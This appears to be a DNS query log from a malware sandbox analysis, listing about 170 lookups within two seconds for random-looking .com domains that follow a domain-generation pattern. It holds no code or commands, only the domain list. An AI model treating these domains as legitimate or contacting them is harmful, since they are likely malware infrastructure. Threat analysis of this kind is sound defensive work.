                                                                                                                                                                                                            Sep 8, 2024 09:00:30.417054892 CEST192.168.2.41.1.1.10x9c79Standard query (0)lymylij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.417526960 CEST192.168.2.41.1.1.10x3073Standard query (0)vofybic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.418194056 CEST192.168.2.41.1.1.10xd0e7Standard query (0)gatyduh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.418657064 CEST192.168.2.41.1.1.10x5c62Standard query (0)lykymyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.419297934 CEST192.168.2.41.1.1.10x4c34Standard query (0)vopydum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.420408010 CEST192.168.2.41.1.1.10x9facStandard query (0)gadyduz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.422489882 CEST192.168.2.41.1.1.10x3defStandard query (0)puzymev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.423638105 CEST192.168.2.41.1.1.10xb230Standard query (0)qeqyloq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.433758974 CEST192.168.2.41.1.1.10xc324Standard query (0)vofydut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.434087038 CEST192.168.2.41.1.1.10xa360Standard query (0)lyxymed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.437161922 CEST192.168.2.41.1.1.10x2572Standard query (0)pufydul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.453361034 CEST192.168.2.41.1.1.10x71e7Standard query (0)qexyqyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.459084988 CEST192.168.2.41.1.1.10x231Standard query (0)gaqyzoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.473381042 CEST192.168.2.41.1.1.10xfde5Standard query (0)vowyzam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.508884907 CEST192.168.2.41.1.1.10xa58aStandard query (0)lygyfir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.509584904 CEST192.168.2.41.1.1.10x979fStandard query (0)vojygok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.509938955 CEST192.168.2.41.1.1.10x71b3Standard query (0)lyvywux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.510267019 CEST192.168.2.41.1.1.10x79ecStandard query (0)qetyxeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.510639906 CEST192.168.2.41.1.1.10xa8fStandard query (0)gahyfow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.510713100 CEST192.168.2.41.1.1.10xfe41Standard query (0)puvywup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.511032104 CEST192.168.2.41.1.1.10x5125Standard query (0)gacyqys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.511223078 CEST192.168.2.41.1.1.10xcb42Standard query (0)lyryxen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.511356115 CEST192.168.2.41.1.1.10x21e3Standard query (0)puryxag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.511603117 CEST192.168.2.41.1.1.10x6ab3Standard query (0)qegyfil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.511744022 CEST192.168.2.41.1.1.10x7ab2Standard query (0)gatycyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.514334917 CEST192.168.2.41.1.1.10x8063Standard query (0)pujygaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.515816927 CEST192.168.2.41.1.1.10x42e8Standard query (0)volyjym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.516436100 CEST192.168.2.41.1.1.10xb01cStandard query (0)gadyvis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.517182112 CEST192.168.2.41.1.1.10x977cStandard query (0)qeqytal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.518608093 CEST192.168.2.41.1.1.10x482cStandard query (0)puzyjyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.518625975 CEST192.168.2.41.1.1.10x3262Standard query (0)lymytar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.520354986 CEST192.168.2.41.1.1.10x328Standard query (0)qedyvuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.523591042 CEST192.168.2.41.1.1.10xe96Standard query (0)pumytol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.524122953 CEST192.168.2.41.1.1.10x7508Standard query (0)galyheh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.524508953 CEST192.168.2.41.1.1.10x756bStandard query (0)vocyquc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.525804043 CEST192.168.2.41.1.1.10xa340Standard query (0)lysyvud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.526437044 CEST192.168.2.41.1.1.10x202aStandard query (0)qekyheq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.526875019 CEST192.168.2.41.1.1.10x3dfcStandard query (0)vonyrot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.527133942 CEST192.168.2.41.1.1.10xc035Standard query (0)ganyriz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.527596951 CEST192.168.2.41.1.1.10x364dStandard query (0)pupycuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.529006004 CEST192.168.2.41.1.1.10x9a60Standard query (0)vopycyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.529633999 CEST192.168.2.41.1.1.10x2995Standard query (0)lykygaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.599558115 CEST192.168.2.41.1.1.10x444bStandard query (0)qebyrip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.907922029 CEST192.168.2.41.1.1.10x3310Standard query (0)volymaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.909954071 CEST192.168.2.41.1.1.10x37ceStandard query (0)qedysyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.910505056 CEST192.168.2.41.1.1.10x21daStandard query (0)galynab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.920286894 CEST192.168.2.41.1.1.10x8f08Standard query (0)lyvyjyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.921262980 CEST192.168.2.41.1.1.10xf330Standard query (0)lysysyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.921998978 CEST192.168.2.41.1.1.10x2e07Standard query (0)vonykuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.922640085 CEST192.168.2.41.1.1.10x6e3fStandard query (0)qekynog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.923008919 CEST192.168.2.41.1.1.10xd7bfStandard query (0)pupypep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.923154116 CEST192.168.2.41.1.1.10x655eStandard query (0)vopypec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.923815966 CEST192.168.2.41.1.1.10xc561Standard query (0)lykynon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.924256086 CEST192.168.2.41.1.1.10x3f0aStandard query (0)pumyliq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.924732924 CEST192.168.2.41.1.1.10xc1dbStandard query (0)ganykuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.927309036 CEST192.168.2.41.1.1.10x6416Standard query (0)gaqykus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.928396940 CEST192.168.2.41.1.1.10xf0dStandard query (0)gatypas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.938913107 CEST192.168.2.41.1.1.10x40fbStandard query (0)pufypeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.950675964 CEST192.168.2.41.1.1.10x1e95Standard query (0)qexynol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.967291117 CEST192.168.2.41.1.1.10x9c6cStandard query (0)qegysyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.967746019 CEST192.168.2.41.1.1.10xc411Standard query (0)lygysen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.972526073 CEST192.168.2.41.1.1.10xb934Standard query (0)vowykuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.972718954 CEST192.168.2.41.1.1.10xf289Standard query (0)purylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.973011971 CEST192.168.2.41.1.1.10x891aStandard query (0)gacynow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.024898052 CEST192.168.2.41.1.1.10x7a25Standard query (0)vocymak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.026422977 CEST192.168.2.41.1.1.10xff48Standard query (0)lyrylix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.100512981 CEST192.168.2.41.1.1.10x9494Standard query (0)gahydyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.102715969 CEST192.168.2.41.1.1.10x78bStandard query (0)puvymaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.113661051 CEST192.168.2.41.1.1.10xeb51Standard query (0)vonyqym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.116025925 CEST192.168.2.41.1.1.10x478eStandard query (0)galyfis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.118504047 CEST192.168.2.41.1.1.10x1486Standard query (0)pumywug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.122648954 CEST192.168.2.41.1.1.10xa2a8Standard query (0)qebykul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.124488115 CEST192.168.2.41.1.1.10x688bStandard query (0)qetytav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.126893997 CEST192.168.2.41.1.1.10xfa5fStandard query (0)pujybig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.127504110 CEST192.168.2.41.1.1.10x43a7Standard query (0)vojybim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.130132914 CEST192.168.2.41.1.1.10xde53Standard query (0)gahyvuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.131609917 CEST192.168.2.41.1.1.10xcea2Standard query (0)lysyxar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.132671118 CEST192.168.2.41.1.1.10x8eeaStandard query (0)puvyjyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.139446974 CEST192.168.2.41.1.1.10xeda0Standard query (0)lyrytod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.153621912 CEST192.168.2.41.1.1.10xc140Standard query (0)vocyjet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.153820992 CEST192.168.2.41.1.1.10x17daStandard query (0)qegyvuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.153974056 CEST192.168.2.41.1.1.10xc749Standard query (0)vowyrif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.154799938 CEST192.168.2.41.1.1.10x638Standard query (0)gacyhez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.155086040 CEST192.168.2.41.1.1.10xfea6Standard query (0)qexyhap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.155571938 CEST192.168.2.41.1.1.10x3005Standard query (0)pufycyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.156239033 CEST192.168.2.41.1.1.10x5f8cStandard query (0)gaqyrib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.156699896 CEST192.168.2.41.1.1.10x8073Standard query (0)vofycyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.159590960 CEST192.168.2.41.1.1.10x9d95Standard query (0)lymywun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.159909964 CEST192.168.2.41.1.1.10xa399Standard query (0)volygoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.160083055 CEST192.168.2.41.1.1.10x78dStandard query (0)qeqyrug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.160238028 CEST192.168.2.41.1.1.10x2b67Standard query (0)qetylip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.160358906 CEST192.168.2.41.1.1.10x423cStandard query (0)qedyxel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.160387039 CEST192.168.2.41.1.1.10x4f8aStandard query (0)lykyfud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.160607100 CEST192.168.2.41.1.1.10x218fStandard query (0)qebyqeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.160634041 CEST192.168.2.41.1.1.10x8304Standard query (0)vopyzot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.160836935 CEST192.168.2.41.1.1.10xb93eStandard query (0)pujyduv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.161000967 CEST192.168.2.41.1.1.10xe347Standard query (0)qekyfiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.161067009 CEST192.168.2.41.1.1.10x734cStandard query (0)vojyduf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.161251068 CEST192.168.2.41.1.1.10x1bb9Standard query (0)pupyxal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.161433935 CEST192.168.2.41.1.1.10xc5e4Standard query (0)gatyzoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.161618948 CEST192.168.2.41.1.1.10xe06bStandard query (0)puzygop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.161870003 CEST192.168.2.41.1.1.10x2344Standard query (0)purytov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.163575888 CEST192.168.2.41.1.1.10xbbe0Standard query (0)ganyqyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.164150953 CEST192.168.2.41.1.1.10xe2b5Standard query (0)lyvymej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.164892912 CEST192.168.2.41.1.1.10x24a4Standard query (0)gadycew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.165040970 CEST192.168.2.41.1.1.10x5ec9Standard query (0)lyxygax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.673665047 CEST192.168.2.41.1.1.10xfeccStandard query (0)lyxynir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.675209999 CEST192.168.2.41.1.1.10x713aStandard query (0)vofypam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.680660009 CEST192.168.2.41.1.1.10xee7eStandard query (0)pumyjev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.686549902 CEST192.168.2.41.1.1.10x602cStandard query (0)qedytoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.688024998 CEST192.168.2.41.1.1.10x13d6Standard query (0)vopykum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.703552008 CEST192.168.2.41.1.1.10x9a59Standard query (0)lykyser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.703735113 CEST192.168.2.41.1.1.10x3334Standard query (0)qebyniv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.703854084 CEST192.168.2.41.1.1.10x89d3Standard query (0)pujypal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.703926086 CEST192.168.2.41.1.1.10x1513Standard query (0)qeqykyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.709271908 CEST192.168.2.41.1.1.10x8460Standard query (0)volybut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.711663961 CEST192.168.2.41.1.1.10x2a72Standard query (0)qekyvup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.714162111 CEST192.168.2.41.1.1.10x170Standard query (0)pumymap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.714832067 CEST192.168.2.41.1.1.10x66e1Standard query (0)gatyruw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.715568066 CEST192.168.2.41.1.1.10x73b6Standard query (0)qekysel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.716392040 CEST192.168.2.41.1.1.10xe86eStandard query (0)pujycyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.718869925 CEST192.168.2.41.1.1.10xe9c6Standard query (0)ganynos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.719804049 CEST192.168.2.41.1.1.10x9ba8Standard query (0)vopyrik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.725007057 CEST192.168.2.41.1.1.10x1ff4Standard query (0)lykyvyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.725089073 CEST192.168.2.41.1.1.10x8702Standard query (0)galydyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.725199938 CEST192.168.2.41.1.1.10xd9b9Standard query (0)qedylig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.727727890 CEST192.168.2.41.1.1.10x4276Standard query (0)pupylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.727757931 CEST192.168.2.41.1.1.10x2493Standard query (0)qexyfuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.729636908 CEST192.168.2.41.1.1.10xfedcStandard query (0)gatykyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.741764069 CEST192.168.2.41.1.1.10x701bStandard query (0)lymymax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.742116928 CEST192.168.2.41.1.1.10x20dbStandard query (0)gaqyqez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.742784977 CEST192.168.2.41.1.1.10x535cStandard query (0)pufyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.742966890 CEST192.168.2.41.1.1.10x5ab0Standard query (0)volydyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.743180037 CEST192.168.2.41.1.1.10xcc3Standard query (0)vofyzof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.743478060 CEST192.168.2.41.1.1.10x3843Standard query (0)gadypah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.744023085 CEST192.168.2.41.1.1.10x4414Standard query (0)lyxyfuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.744348049 CEST192.168.2.41.1.1.10x18b3Standard query (0)gadyzib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.744944096 CEST192.168.2.41.1.1.10xfb7Standard query (0)puzyduq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.767381907 CEST192.168.2.41.1.1.10xbc3dStandard query (0)ganyhab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.767510891 CEST192.168.2.41.1.1.10xe88eStandard query (0)puzybil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.767792940 CEST192.168.2.41.1.1.10xb0cbStandard query (0)qeqyqep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.768018961 CEST192.168.2.41.1.1.10xd0b6Standard query (0)vocybuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.768217087 CEST192.168.2.41.1.1.10xbb8fStandard query (0)lyryjej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.768287897 CEST192.168.2.41.1.1.10x8269Standard query (0)gahypoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.768491030 CEST192.168.2.41.1.1.10x3971Standard query (0)puvybuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.768692017 CEST192.168.2.41.1.1.10xc000Standard query (0)qetykyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.768870115 CEST192.168.2.41.1.1.10xad7aStandard query (0)qegytop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.769068956 CEST192.168.2.41.1.1.10xc181Standard query (0)lyvynid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.769145012 CEST192.168.2.41.1.1.10xf712Standard query (0)vojypat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.769341946 CEST192.168.2.41.1.1.10xc2dfStandard query (0)vowyqyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.769409895 CEST192.168.2.41.1.1.10x420fStandard query (0)lygyxad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.769598961 CEST192.168.2.41.1.1.10x2ed9Standard query (0)qetyrul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.769701958 CEST192.168.2.41.1.1.10x8a91Standard query (0)gahyces.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.769861937 CEST192.168.2.41.1.1.10xba75Standard query (0)lysylun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.769962072 CEST192.168.2.41.1.1.10x3dcbStandard query (0)pupytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.770124912 CEST192.168.2.41.1.1.10xcb5aStandard query (0)qegyxav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.770200014 CEST192.168.2.41.1.1.10xc972Standard query (0)vonyjef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.770445108 CEST192.168.2.41.1.1.10x4c0bStandard query (0)lyvygon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.770536900 CEST192.168.2.41.1.1.10x6e1eStandard query (0)vocygim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.770842075 CEST192.168.2.41.1.1.10x674aStandard query (0)lyrywur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.771100044 CEST192.168.2.41.1.1.10xf279Standard query (0)purywyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.771349907 CEST192.168.2.41.1.1.10x517Standard query (0)vojycec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.772331953 CEST192.168.2.41.1.1.10x54baStandard query (0)puvygog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.773360968 CEST192.168.2.41.1.1.10x7718Standard query (0)qebyhag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.773536921 CEST192.168.2.41.1.1.10x8a1cStandard query (0)galyvuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.773694992 CEST192.168.2.41.1.1.10xc79bStandard query (0)lysytoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.773853064 CEST192.168.2.41.1.1.10xa587Standard query (0)lymyjyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.774285078 CEST192.168.2.41.1.1.10xb3a1Standard query (0)vonymoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.777992964 CEST192.168.2.41.1.1.10xf3cStandard query (0)gacyfih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.790327072 CEST192.168.2.41.1.1.10x96d2Standard query (0)puryjeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.210016012 CEST192.168.2.41.1.1.10x3b39Standard query (0)gacyvub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.211595058 CEST192.168.2.41.1.1.10x9b18Standard query (0)lygytix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.215580940 CEST192.168.2.41.1.1.10x30f8Standard query (0)pufytip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.221369028 CEST192.168.2.41.1.1.10xb08fStandard query (0)pumygil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.226690054 CEST192.168.2.41.1.1.10x166eStandard query (0)gaqyhaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.228173018 CEST192.168.2.41.1.1.10xbbbeStandard query (0)qedyruv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.228216887 CEST192.168.2.41.1.1.10x62bdStandard query (0)qexyvyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.228676081 CEST192.168.2.41.1.1.10x426eStandard query (0)lyxyvyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.228846073 CEST192.168.2.41.1.1.10x3714Standard query (0)vofyruc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.229671955 CEST192.168.2.41.1.1.10xfc7eStandard query (0)volycem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.230160952 CEST192.168.2.41.1.1.10xe327Standard query (0)lymygor.comA (IP address)IN (0x0001)false
